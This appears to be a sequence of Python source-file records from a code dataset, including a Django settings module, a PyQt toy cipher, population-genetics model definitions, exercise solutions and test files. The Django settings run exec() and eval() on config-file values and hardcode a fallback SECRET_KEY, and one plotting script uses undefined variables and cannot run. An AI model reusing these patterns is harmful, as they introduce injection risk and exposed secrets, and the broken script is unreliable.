csv_output.append({\n 'season': season,\n 'league': league,\n 'team': team,\n 'w': results[team]['W'],\n 'l': results[team]['L'],\n 'd': results[team]['D'],\n 'pts': points[ii],\n 'position': positions[ii],\n 'AMV': AMVs[ii],\n 'AMS': AMSs[ii],\n 'AMST': AMSTs[ii]\n })\n\n plt.figure()\n plt.subplot(2, 2, 1)\n plt.title(\"%s - %s\" % (season, league))\n plt.plot(AMVs, points, 'o')\n plt.xlabel(\"AMV\")\n plt.ylabel(\"Points\")\n plt.subplot(2, 2, 2)\n plt.title(\"%s - %s\" % (season, league))\n plt.plot(AMSs, points, 'o')\n plt.xlabel(\"AMS\")\n plt.ylabel(\"Points\")\n plt.subplot(2, 2, 3)\n plt.title(\"%s - %s\" % (season, league))\n plt.plot(AMSTs, points, 'o')\n plt.xlabel(\"AMST\")\n plt.ylabel(\"Points\")\n plt.subplot(2, 2, 4)\n plt.title(\"%s - %s\" % (season, league))\n plt.plot(AMVs, positions, 'o')\n plt.xlabel(\"AMV\")\n plt.ylabel(\"Position\")\n\nwith open(\"ranks.csv\", 'w') as fid:\n writer = csv.DictWriter(fid, headings)\n writer.writeheader()\n writer.writerows(csv_output)\npprint(csv_output)\nplt.show()\n","sub_path":"MeasureRankQuality.py","file_name":"MeasureRankQuality.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"330788617","text":"#!/bin/python3\n\"\"\"\nAlice and Bob each created one problem for HackerRank. A reviewer rates the two challenges, awarding points on a scale from to for three categories: problem clarity, originality, and difficulty.\n\nWe define the rating for Alice's challenge to be the triplet , and the rating for Bob's challenge to be the triplet .\n\nYour task is to find their comparison points by comparing with , with , and with .\n\nIf , then Alice is awarded point.\nIf , then Bob is awarded point.\nIf , then neither person receives a point.\nComparison points is the total points a person earned.\n\nGiven and , can you compare the two challenges and print their respective comparison points?\n\nInput Format\n\nThe first line contains space-separated integers, , , and , describing the respective values in triplet . 
\nThe second line contains space-separated integers, , , and , describing the respective values in triplet .\n\nConstraints\n\nOutput Format\n\nPrint two space-separated integers denoting the respective comparison points earned by Alice and Bob.\n\nSample Input\n\n5 6 7\n3 6 10\nSample Output\n\n1 1\n\"\"\" \n\nimport os\nimport sys\n\n#\n# Complete the solve function below.\n#\ndef solve(a0, a1, a2, b0, b1, b2):\n #\n # Write your code here.\n #\n alice =0\n bob=0\n\n if (a0>b0):\n print(\"Alice scores more\")\n alice = alice+1\n elif (b0 > a0):\n print(\"Bob score more\")\n bob = bob + 1\n\n if (a1>b1):\n print(\"Alice scores more\")\n alice = alice+1\n elif (b1 > a1):\n print(\"Bob score more\")\n bob = bob + 1\n \n if (a2>b2):\n print(\"Alice scores more\")\n alice = alice+1\n elif(b2 > a2):\n print(\"Bob score more\")\n bob = bob + 1\n\n result = (alice, bob)\n\n return result\n \n\nif __name__ == '__main__':\n #f = open(os.environ['OUTPUT_PATH'], 'w')\n\n a0A1A2 = input().split()\n\n a0 = int(a0A1A2[0])\n\n a1 = int(a0A1A2[1])\n\n a2 = int(a0A1A2[2])\n\n b0B1B2 = input().split()\n\n b0 = int(b0B1B2[0])\n\n b1 = int(b0B1B2[1])\n\n b2 = int(b0B1B2[2])\n\n result = solve(a0, a1, a2, b0, b1, b2)\n print(result)\n\n #f.write(' '.join(map(str, result)))\n #f.write('\\n')\n\n #f.close()\n","sub_path":"Algorithms/alicebob.py","file_name":"alicebob.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"167017873","text":"with open('../../CSV/评论分词/word_vec_new1.txt', 'w',encoding='utf-8') as f:\n with open('../../CSV/评论分词/word_vec_new.txt', 'r',encoding='utf-8') as fp:\n\n flag=0\n for line in fp:\n for i in line:\n if i==',':\n flag=1\n break\n\n if flag==0:\n line = str(line).replace(\"\\n\", \"\")\n f.write(line)\n else:\n line = str(line).replace(\"\\n\", \"\")\n f.write('\\n'+line)\n\n flag=0\n\n","sub_path":"NetEaseCloudMusicCrawler_TEST/ANALYSOR/pycode/测试2.py","file_name":"测试2.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"289857558","text":"\"\"\"\nGenome, genetic map and demographic model definitions for humans.\n\"\"\"\n\nimport msprime\n\nimport stdpopsim.models as models\nimport stdpopsim.genomes as genomes\nimport stdpopsim.genetic_maps as genetic_maps\n\n\n###########################################################\n#\n# Genetic maps\n#\n###########################################################\n\n\nclass Comeron2012_dm6(genetic_maps.GeneticMap):\n \"\"\"\n Comeron et al. (2012) maps (lifted over to dm6) used in\n Currently needs a readme as to the lift over, etc.\n \"\"\"\n url = (\n \"http://sesame.uoregon.edu/~adkern/dmel_recombination_map/\"\n \"comeron2012_maps.tar.gz\")\n file_pattern = \"genetic_map_comeron2012_dm6_{name}.txt\"\n\n\ngenetic_maps.register_genetic_map(Comeron2012_dm6())\n\n###########################################################\n#\n# Genome definition\n#\n###########################################################\n\n# List of chromosomes. 
Data for length information based on DM6,\n# https://www.ncbi.nlm.nih.gov/genome/?term=drosophila+melanogaster.\n# FIXME: add mean mutation and recombination rate data to this table.\n_chromosome_data = \"\"\"\\\nchrX 23542271\nchr2L 23513712\nchr2R 25286936\nchr3L 28110227\nchr3R 32079331\nchr4 1348131\nchrY 3667352\nchrM 19524\n\"\"\"\n\n_chromosomes = []\nfor line in _chromosome_data.splitlines():\n name, length = line.split()[:2]\n _chromosomes.append(genomes.Chromosome(\n name=name, length=int(length),\n default_mutation_rate=8.4e-9, # WRONG!, underestimate used in S&S\n default_recombination_rate=8.4e-9)) # WRONG, underestimate used in S&S!\n\n\n#: :class:`stdpopsim.Genome` definition for D. melanogaster. Chromosome length data is\n#: based on `dm6 `_.\ngenome = genomes.Genome(\n species=\"drosophila_melanogaster\",\n chromosomes=_chromosomes,\n default_genetic_map=Comeron2012_dm6.name)\n\n\n###########################################################\n#\n# Demographic models\n#\n###########################################################\n\ndefault_generation_time = 0.1\n\n\nclass SheehanSongThreeEpoch(models.Model):\n \"\"\"\n Model Name:\n SheehanSongThreeEpoch\n\n Model Description:\n The three epoch (modern, bottleneck, ancestral) model estimated for a\n single African Drosophila Melanogaster population from `Sheehan and Song `_ . Population sizes are estimated by a\n deep learning model trained on simulation data. NOTE: Due to differences in\n coalescence units between PSMC (2N) and msms (4N) the number of generations were\n doubled from PSMC estimates when simulating data from msms in the original\n publication. We have faithfully represented the published model here.\n\n Model population indexes:\n - African D. melanogaster: 0\n\n Parameter Table:\n .. csv-table::\n :widths: 15 8 20\n :header: \"Parameter Type (units)\", \"Value\", \"Description\"\n :file: ../docs/parameter_tables/drosophila_melanogaster/SheehanSongThreeEpoch_params.csv\n\n CLI help:\n python -m stdpopsim drosophila-melanogaster SheehanSongThreeEpoch -h\n\n Citation:\n Sheehan, S. & Song, Y. S. Deep Learning for Population Genetic Inference. PLOS\n Computational Biology 12, e1004845 (2016).\n\n \"\"\" # noqa: E501\n\n author = \"Sheehan et al.\"\n year = 2016\n doi = \"https://doi.org/10.1371/journal.pcbi.1004845\"\n\n def __init__(self):\n # Parameter values from \"Simulating Data\" section\n # these are assumptions, not estimates\n N_ref = 100000\n t_1_coal = 0.5\n t_2_coal = 5.0\n # estimates from the ANN\n N_R = 544200\n N_B = 145300\n N_A = 652700\n # Times are provided in 4N_ref generations, so we convert into generations.\n # generation_time = 10 / year\n t_1 = t_1_coal * 4 * N_ref\n t_2 = (t_1_coal + t_2_coal) * 4 * N_ref\n self.generation_time = default_generation_time\n\n # Population metadata\n metadata_afr = {\n \"name\": \"AFR_dmel\",\n \"description\": \"African D. 
melanogaster population\"\n }\n\n # Single population in this model\n self.population_configurations = [\n msprime.PopulationConfiguration(initial_size=N_R, metadata=metadata_afr),\n ]\n self.demographic_events = [\n # Size change at bottleneck (back in time; BIT)\n msprime.PopulationParametersChange(\n time=t_1, initial_size=N_B, population_id=0),\n # Size change at recovery (BIT)\n msprime.PopulationParametersChange(\n time=t_2, initial_size=N_A, population_id=0)\n ]\n self.migration_matrix = [[0]]\n\n\nclass LiStephanTwoPopulation(models.Model):\n \"\"\"\n Model Name:\n LiStephanTwoPopulation\n\n Model Description:\n The three epoch (modern, bottleneck, ancestral) model estimated for two\n Drosophila Melanogaster populations: African (ancestral) and European (derived)\n from `Li and Stephan `_ .\n\n Model population indexes:\n - African D. melanogaster: 0\n - European D. melanogaster: 1\n\n Parameter Table:\n .. csv-table::\n :widths: 15 8 20\n :header: \"Parameter Type (units)\", \"Value\", \"Description\"\n :file: ../docs/parameter_tables/drosophila_melanogaster/LiStephanTwoPopulation_params.csv\n\n CLI help:\n python -m stdpopsim drosophila-melanogaster LiStephanTwoPopulation -h\n\n Citation:\n Li, H. & Stephan, W. Inferring the Demographic History and Rate of Adaptive Substitution in Drosophila. PLOS Genetics 2, e166 (2006).\n\n \"\"\" # noqa: E501\n\n author = \"Li et al.\"\n year = 2006\n doi = \"https://doi.org/10.1371/journal.pgen.0020166\"\n\n def __init__(self):\n\n # African Parameter values from \"Demographic History of the African\n # Population\" section\n N_A0 = 8.603e06\n t_A0 = 600000 # assuming 10 generations / year\n N_A1 = N_A0 / 5.0\n self.generation_time = default_generation_time\n\n # European Parameter values from \"Demo History of Euro Population\"\n N_E0 = 1.075e06\n N_E1 = 2200\n t_AE = 158000 # generations\n t_E1 = t_AE - 3400\n\n metadata_afr = {\n \"name\": \"AFR_dmel\",\n \"description\": \"African D. melanogaster population\"\n }\n metadata_eu = {\n \"name\": \"EU_dmel\",\n \"description\": \"European D. 
melanogaster population\"\n }\n\n self.population_configurations = [\n msprime.PopulationConfiguration(initial_size=N_A0, metadata=metadata_afr),\n msprime.PopulationConfiguration(initial_size=N_E0, metadata=metadata_eu)\n ]\n self.demographic_events = [\n # Size change at Euro bottleneck\n msprime.PopulationParametersChange(\n time=t_E1, initial_size=N_E1, population_id=1),\n # Split\n msprime.MassMigration(\n time=t_AE, source=1, destination=0, proportion=1.0),\n # African bottleneck\n msprime.PopulationParametersChange(\n time=t_A0, initial_size=N_A1, population_id=0)\n ]\n self.migration_matrix = [\n [0, 0],\n [0, 0],\n ]\n","sub_path":"stdpopsim/drosophila_melanogaster.py","file_name":"drosophila_melanogaster.py","file_ext":"py","file_size_in_byte":7410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"149961711","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport os\nfrom os.path import (\n abspath, dirname, join\n)\n\nfrom common.loader import (\n load_apps, load_settings, load_variable_settings, load_cache_settings,\n load_database_settings, get_variable_value, get_database_config,\n)\n\nfrom common.constants import (\n CONFIDENTIAL_HOME_ENV_NAME, RUNNING_MODE_DEBUG, RUNNING_MODE_ENV_NAME, PROJECT_ROOT,\n SECTION, OPTION, LOGS_PATH, DATABASE_PATH, WEB_SRC_PATH, DJANGO_SRC_PATH\n)\n\nfrom common.utils import (\n create_dir_safely, filter_out_none\n)\n\nfrom common.parser import load_configs\n\nfrom .logging_config import LOGGER_CONF\n\n\n# --- Load CMPortal.cfg ---\n_CONFIG = load_configs('',\n join(os.getenv(CONFIDENTIAL_HOME_ENV_NAME, join(dirname(abspath(__file__)), 'conf')), 'CMPortal.cfg')\n)\n\n# --- Debug flag setting ---\nRUNNING_MODE_ENV_VALUE = os.getenv(RUNNING_MODE_ENV_NAME)\nDEBUG = True if RUNNING_MODE_ENV_VALUE == RUNNING_MODE_DEBUG else _CONFIG.getboolean('Django', 'DEBUG')\n\n# --- Load active app and config settings ---\nACTIVE_APPS = None if not _CONFIG.has_option('Django', 'ACTIVE_APPS') else dict(\n (app.strip(), True) for app in _CONFIG.get('Django', 'ACTIVE_APPS').split(',')\n)\n\nactive_apps = load_apps(ACTIVE_APPS)\nfor app_name in active_apps:\n for v in load_settings(app_name):\n exec('from %s.config.settings import %s' % (app_name, v))\n\n for vd in load_variable_settings(app_name):\n if not _CONFIG.has_option(vd[SECTION], vd[OPTION]): continue\n _value = get_variable_value(_CONFIG, vd)\n exec ('%s=_value' % vd['name'])\n\n# --- Configure datebases ---\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': join(DATABASE_PATH, 'Apollo.db'),\n },\n}\nDATABASE_APPS_MAPPING = dict()\nDATABASES['default'].update(get_database_config(_CONFIG))\nDATABASE_ROUTERS = ['common.router.DatabaseAppsRouter']\nfor app_name in active_apps:\n database, database_mapping = load_database_settings(app_name)\n DATABASES.update(database)\n DATABASE_APPS_MAPPING.update(database_mapping)\n\n# --- Configure caches ---\nCACHES = {\n 'default': {\n 'BACKEND': _CONFIG.get('Django::cache', 'BACKEND') or (\n 'django.core.cache.backends.locmem.LocMemCache' if DEBUG else 'uwsgicache.UWSGICache'),\n 'LOCATION': eval(_CONFIG.get('Django::cache', 'LOCATION')) if _CONFIG.get(\n 'Django::cache', 'LOCATION') else ('locmem-for-debug' if DEBUG else 'default'),\n 'TIMEOUT': _CONFIG.getint('Django::cache', 'TIMEOUT') if _CONFIG.has_option(\n 'Django::cache', 'TIMEOUT') else 300,\n 'OPTIONS': {\n 'MAX_ENTRIES': _CONFIG.getint('Django::cache', 'MAX_ENTRIES'),\n 'CULL_FREQUENCY': 
_CONFIG.getint('Django::cache', 'CULL_FREQUENCY')\n },\n 'KEY_PREFIX': 'cmportal',\n 'VERSION': '1'\n },\n}\nfor app_name in active_apps:\n cache_conf = load_cache_settings(app_name)\n CACHES.update(cache_conf)\n\n# --- Project Start ---\nSITE_ID = 1\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = _CONFIG.get('Django', 'SECRET_KEY') or 'j=f$+!uvk20q7vc2-)huhyqww+@f#okj2b7fytx3@4=g(e@db-'\n\nROOT_URLCONF = 'configs.urls'\n\nLOGIN_URL = u'/account/login/'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'configs.wsgi.application'\n\n# --- configure language code ---\nLANGUAGE_CODE = 'zh-Hans'\nLANGUAGES = (\n ('en-us', 'English'),\n ('zh-Hans', 'Simplified Chines'),\n)\n\n# --- configure timezone and Internationlization---\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nTIME_ZONE = 'Asia/Shanghai'\n\n# --- configure locale path ---\nLOCALE_PATHS = (\n os.path.join(DJANGO_SRC_PATH, \"locales\"),\n)\n\nAUTH_USER_MODEL = 'accounts.Account'\n\n# --- AccessControl Start ---\nALLOWED_HOSTS = _CONFIG.get('Django', 'ALLOWED_HOSTS').split(',') if _CONFIG.has_option('Django', 'ALLOWED_HOSTS') else ['localhost']\n\n# --- flag to control minifying html files ---\nHTML_MINIFY = _CONFIG.getboolean('Django', 'HTML_MINIFY'\n ) if _CONFIG.has_option('Django', 'HTML_MINIFY') else not DEBUG\n\n# --- configure session cookie domain ----\nSESSION_COOKIE_DOMAIN = _CONFIG.get('Django', 'SESSION_COOKIE_DOMAIN')\n\n# -- confiugre logger ---\nLOGGING = LOGGER_CONF\n\n# --- Configure media path ---\nMEDIA_ROOT = _CONFIG.get('Django', 'MEDIA_ROOT') or join(PROJECT_ROOT, 'media')\nMEDIA_URL = '/media/'\n\n# --- Configure static path ---\nSTATIC_URL = '/static/'\nSTATIC_ROOT = _CONFIG.get('Django', 'STATIC_ROOT') or join(PROJECT_ROOT, 'static')\nSTATICFILES_DIRS = [\n WEB_SRC_PATH,\n]\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n# --- Configure Template loader/context_processor/middleware_class/install_apps ---\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.contrib.messages.context_processors.messages',\n 'django.core.context_processors.request',\n 'django.core.context_processors.i18n',\n ],\n 'debug': True if RUNNING_MODE_ENV_VALUE == RUNNING_MODE_DEBUG else _CONFIG.getboolean('Django', 'TEMPLATE_DEBUG'),\n },\n },\n]\n\nMIDDLEWARE_CLASSES = filter(None, [\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django_user_agents.middleware.UserAgentMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'pagination.middleware.PaginationMiddleware',\n 'htmlmin.middleware.HtmlMinifyMiddleware',\n 'htmlmin.middleware.MarkRequestMiddleware',\n])\n\nINSTALLED_APPS = filter(None, [\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'pagination',\n 
'mathfilters',\n])\nINSTALLED_APPS.extend(active_apps)\n","sub_path":"djangosrc/pysrc/configs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"230633164","text":"def selection_sort(list):\n print(\"listnya adalah\", list)\n for i in range (len(list)-1):\n index_min = i \n for j in range(i+1, len(list)):\n if list[index_min] < list[j]:\n index_min = j\n\n #penukaran\n tempat = list[i]\n list[i] = list[index_min]\n list[index_min] = tempat\n \n print('indeks ke:', i+1, 'tukar dengan :', index_min)\n print('iterasi', i, list)\n\n\nselection_sort([4,3,5,6,2,78,98])\n","sub_path":"Alpro 1/P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"434794904","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('management', '0010_auto_20150904_1350'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='homeimg',\n name='home_img_id',\n ),\n migrations.RemoveField(\n model_name='instruments',\n name='item_id',\n ),\n migrations.RemoveField(\n model_name='orderlist',\n name='order_id',\n ),\n migrations.AddField(\n model_name='homeimg',\n name='id',\n field=models.AutoField(auto_created=True, primary_key=True, default=0, serialize=False, verbose_name='ID'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='instruments',\n name='id',\n field=models.AutoField(auto_created=True, primary_key=True, default=0, serialize=False, verbose_name='ID'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='orderlist',\n name='id',\n field=models.AutoField(auto_created=True, primary_key=True, default=0, serialize=False, verbose_name='ID'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='cart',\n name='id',\n field=models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True),\n ),\n ]\n","sub_path":"weborder/management/migrations/0011_auto_20150904_1406.py","file_name":"0011_auto_20150904_1406.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"172963805","text":"import yaml\nimport os\nfrom pypost.common.SettingsClient import SettingsClient\nfrom pypost.common.SettingsManager import setRootSettings\nfrom pypost.common.Settings import Settings\n\n\nclass Evaluation(SettingsClient):\n '''\n classdocs\n '''\n\n def __init__(self, experiment, evaluationID, settings, parameterNames = None,\n parameterValues = None, numTrials=1):\n '''\n Constructor\n '''\n SettingsClient.__init__(self)\n\n self.numTrials = numTrials\n self.evaluationID = evaluationID\n self.parameterNames = parameterNames\n self.parameterValues = parameterValues\n self.globalTrialIDs = []\n\n\n if isinstance(settings, str):\n self.settings = Settings('evaluation')\n self.settings.load(os.path.join(settings, 'settings.yaml'))\n setRootSettings(self.settings)\n\n with open(os.path.join(settings, 'eval.yaml'), 'r') as stream:\n evalSettings = yaml.load(stream)\n\n self.numTrials = evalSettings['numTrials']\n self.parameterNames = evalSettings['parameterNames']\n self.parameterValues = evalSettings['parameterValues']\n\n else:\n self.settings = settings\n\n\n self.setExperiment(experiment, 
evaluationID)\n print(\"Directory is %s\" % self.path)\n\n def setExperiment(self, experiment, evaluationID):\n self.evaluationName = 'eval%03d' % evaluationID\n self.path = os.path.join(experiment.experimentPath, self.evaluationName)\n self.experiment = experiment\n\n def createFileStructure(self, overwrite):\n if not os.path.exists(self.path):\n os.mkdir(self.path)\n\n settingsPath = os.path.join(self.path, 'settings.yaml')\n evalPath = os.path.join(self.path, 'eval.yaml')\n\n self.settings.store(settingsPath)\n dataToStore = dict()\n dataToStore['numTrials'] = self.numTrials\n dataToStore['parameterNames'] = self.parameterNames\n dataToStore['parameterValues'] = self.parameterValues\n\n with open(evalPath, 'w') as stream:\n yaml.dump(dataToStore, stream)\n\n for i in range(0, self.numTrials):\n trialPath = os.path.join(self.path, 'trial%03d' % i)\n if not os.path.isfile(os.path.join(trialPath, 'data.npy')):\n trial = self.experiment.createTrial(self.path, i, self.settings)\n trial.storeTrial(overwrite)\n else:\n print(\"Found existing trial %03d, not recreating\" % i)\n trialId = self.experiment.registerTrial(self, trialPath)\n self.globalTrialIDs.append(trialId)\n\n for root, dirs, files in os.walk(self.path):\n for d in dirs:\n os.chmod(os.path.join(root, d), 0o775)\n for f in files:\n os.chmod(os.path.join(root, f), 0o775)\n\n def startLocal(self, trialIds = None):\n if trialIds:\n trialIds = self.globalTrialIDs[trialIds]\n else:\n trialIds = self.globalTrialIDs\n\n self.experiment.startLocal(trialIds)\n\n def startSLURM(self, trialIds=None):\n if trialIds:\n trialIds = self.globalTrialIDs[trialIds]\n else:\n trialIds = self.globalTrialIDs\n\n self.experiment.startSLURM(trialIds)\n\n def loadTrialFromID(self, trialID):\n globalID = self.globalTrialIDs[trialID]\n return self.experiment.loadTrialFromID(globalID)\n\n def getNumTrials(self):\n return len(self.globalTrialIDs)","sub_path":"src/pypost/experiments/Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"284512265","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# -*- coding: cp1254 -*-\n\nimport sys\nimport time\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\na = (\":#><`$|{[]}@.,;!^+&/()=?_%-* ~abcdefghijklmnopqrstwyzuvxUABCDEFGHIJKLMNOQPRSTWXVYZ1234567890'\" + \"\\\\\" + \"\\\"\"+u\"ĞÜŞÇÖİğüşıöç\" + u\"飨æß\")\n\nclass DaVinci(QWidget):\n\tdef __init__(self, parent=None):\n\t\n\t\tQWidget.__init__(self,parent)\n\t\tself.setGeometry(300,200,600,400)\n\t\tself.setWindowTitle(u\"DaVinci (Şifreleme ve Deşifreleme)\")\n\t\tself.setWindowIcon(QIcon(\".\\\\anonymous.png\"))\n\t\tself.KLabel = QLabel(\"Anahtar Kelime:\",self)\n\t\tself.TLabel = QLabel(u\"Metin Ekranı:\",self)\n\t\tself.RLabel = QLabel(u\"Sonuç Ekranı:\",self)\n\t\tself.EButton = QPushButton(u\"Şifrele\")\n\t\tself.DButton = QPushButton(u\"Deşifrele\")\n\t\tself.KEdit = QLineEdit(self)\n\t\tself.TEdit = QTextEdit(self)\n\t\tself.REdit = QPlainTextEdit(self)\n\t\tself.REdit.setReadOnly(1)\n\t\tself.connect(self.EButton,SIGNAL(\"clicked()\"),self.Encrypt)\n\t\tself.connect(self.DButton,SIGNAL(\"clicked()\"),self.Decrypt)\n\t\tself.grid = 
QGridLayout()\n\t\tself.grid.setSpacing(10)\n\t\tself.grid.addWidget(self.KLabel,0,0)\n\t\tself.grid.addWidget(self.TLabel,1,0)\n\t\tself.grid.addWidget(self.RLabel,2,0)\n\t\tself.grid.addWidget(self.KEdit,0,1)\n\t\tself.grid.addWidget(self.TEdit,1,1)\n\t\tself.grid.addWidget(self.REdit,2,1)\n\t\tself.grid.addWidget(self.EButton,3,1)\n\t\tself.grid.addWidget(self.DButton,4,1)\n\t\tself.setLayout(self.grid)\n\t\t\n\tdef Encrypt(self):\n\t\tkey = unicode(self.KEdit.text())\n\t\tword = unicode(self.TEdit.toPlainText())\n\t\tword = len(key) * \" \" + \":\" + word\n\t\tson = \"\"\n\t\ti = 0\n\t\tfor k in word:\n\t\t\tif i >= len(key):\n\t\t\t\t\ti = 0\n\t\t\tif a.find(k) + a.find(key[i]) + 1 >= len(a):\n\t\t\t\tson = son + a[a.find(k) + a.find(key[i]) - len(a)]\n\t\t\telse:\n\t\t\t\tson = son + a[a.find(k) + a.find(key[i])]\n\t\t\t\t\n\t\t\ti = i + 1\n\t\t\n\t\tself.REdit.setPlainText(son)\n\t\t\n\tdef Decrypt(self):\n\t\tkey = unicode(self.KEdit.text())\n\t\tword = unicode(self.TEdit.toPlainText())\n\t\tson = \"\"\n\t\ti = 0\n\t\tfor k in word:\n\t\t\tif i >= len(key):\n\t\t\t\t\ti = 0\n\t\t\tif a.find(k) - a.find(key[i]) + 1 < 0:\n\t\t\t\tson = son + a[a.find(k) - a.find(key[i]) + len(a)]\n\t\t\telse:\n\t\t\t\tson = son + a[a.find(k) - a.find(key[i])]\n\t\t\ti = i + 1\n\t\tson = son[len(key) + 1:]\n\t\tself.REdit.setPlainText(son)\n\napp = QApplication(sys.argv)\nDaVinci = DaVinci()\nDaVinci.show()\nsys.exit(app.exec_())\n","sub_path":"DaVinciQt.py","file_name":"DaVinciQt.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"728377","text":"import numpy as np\nimport sys\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import NullFormatter\nstdev = np.std\nsqrt = np.sqrt\nnullfmt = NullFormatter()\n\ndef plot_1d(xdata1, ydata1, yerr1, xdata2, ydata2, yerr2, x_axis, y_axis, system):\n plt.errorbar(xdata1, ydata1, yerr1, color='k',label=\"Explicit\",errorevery=3,elinewidth=1.5)\n plt.errorbar(xdata2, ydata2, yerr2, color='r',label=\"IS-SPA (cpu)\",errorevery=3,elinewidth=1.5)\n plt.errorbar(xdata3, ydata3, yerr3, color='b',label=\"IS-SPA (gpu)\",errorevery=3,elinewidth=1.5)\n plt.errorbar(xdata4, ydata4, yerr4, color='g',label=\"IS-SPA (gpu) old\",errorevery=3,elinewidth=1.5)\n plt.grid(b=True, which='major', axis='both', color='#808080', linestyle='--')\n plt.xlabel(r'%s' %(x_axis), size=12)\n plt.ylabel(r'%s' %(y_axis), size=12)\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), shadow=True, ncol=2, fontsize = 'medium')\n plt.xlim((0,16))\n #plt.ylim((1.5, 3.0))\n plt.savefig('%s.PMF.4.png' %(system))\n plt.close()\n\n\ndata1 = np.loadtxt(\"ADI2.exp.pmf.bs.dat\")\ndata2 = np.loadtxt(\"EMUS.cpu.pmf.dat\")\nplot_1d(data1[index1:,0], data1[index1:,i], data1[index1:,i+1], data2[:,0], data2[:,1], data2[:,2], data3[:,0], data3[:,1], data3[:,2], data4[:,0], data4[:,1], data4[:,2], 'Distance ($\\AA$)', '$u_{pmf}$ (kcal/mol)', \"ADI2\")\n","sub_path":"algorithm_1/ADI2_US/EMUS/CPU/old/plot4.py","file_name":"plot4.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"363714458","text":"# -*- coding: utf8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom tuskar_ui.test import helpers as test\nfrom tuskar_ui.utils import utils\n\n\nclass TestItem(object):\n def __init__(self, index):\n self.index = index\n\n\nclass UtilsTests(test.TestCase):\n def test_filter_items(self):\n items = [TestItem(i) for i in range(7)]\n\n first = utils.filter_items(items, index=0)\n even = utils.filter_items(items, index__in=(0, 2, 4, 6))\n last_two = utils.filter_items(items, index__not_in=range(5))\n\n self.assertEqual(utils.length(first), 1)\n self.assertEqual(utils.length(even), 4)\n self.assertEqual(utils.length(last_two), 2)\n","sub_path":"tuskar_ui/test/utils_tests.py","file_name":"utils_tests.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"362561213","text":"import unittest\nfrom stats_series_generator.categorical_streams import CorrelatedWeightedCategoricalStreams\nimport numpy as np\nimport copy\n\nclass TestCorrelatedWeightedCategoricalStreams(unittest.TestCase):\n def setUp(self):\n np.random.seed(seed=13)\n self.rnd_stream = CorrelatedWeightedCategoricalStreams()\n\n\n def tearDown(self):\n self.rnd_stream = None\n\n def test_get_set_params(self):\n weights = copy.deepcopy(self.rnd_stream.weights)\n np.random.seed(seed=13)\n x = self.rnd_stream.get_samples(10)\n\n self.rnd_stream.weights = weights\n np.random.seed(seed=13)\n y = self.rnd_stream.get_samples(10)\n \n self.assertTrue(np.all(x==y))\n\n def 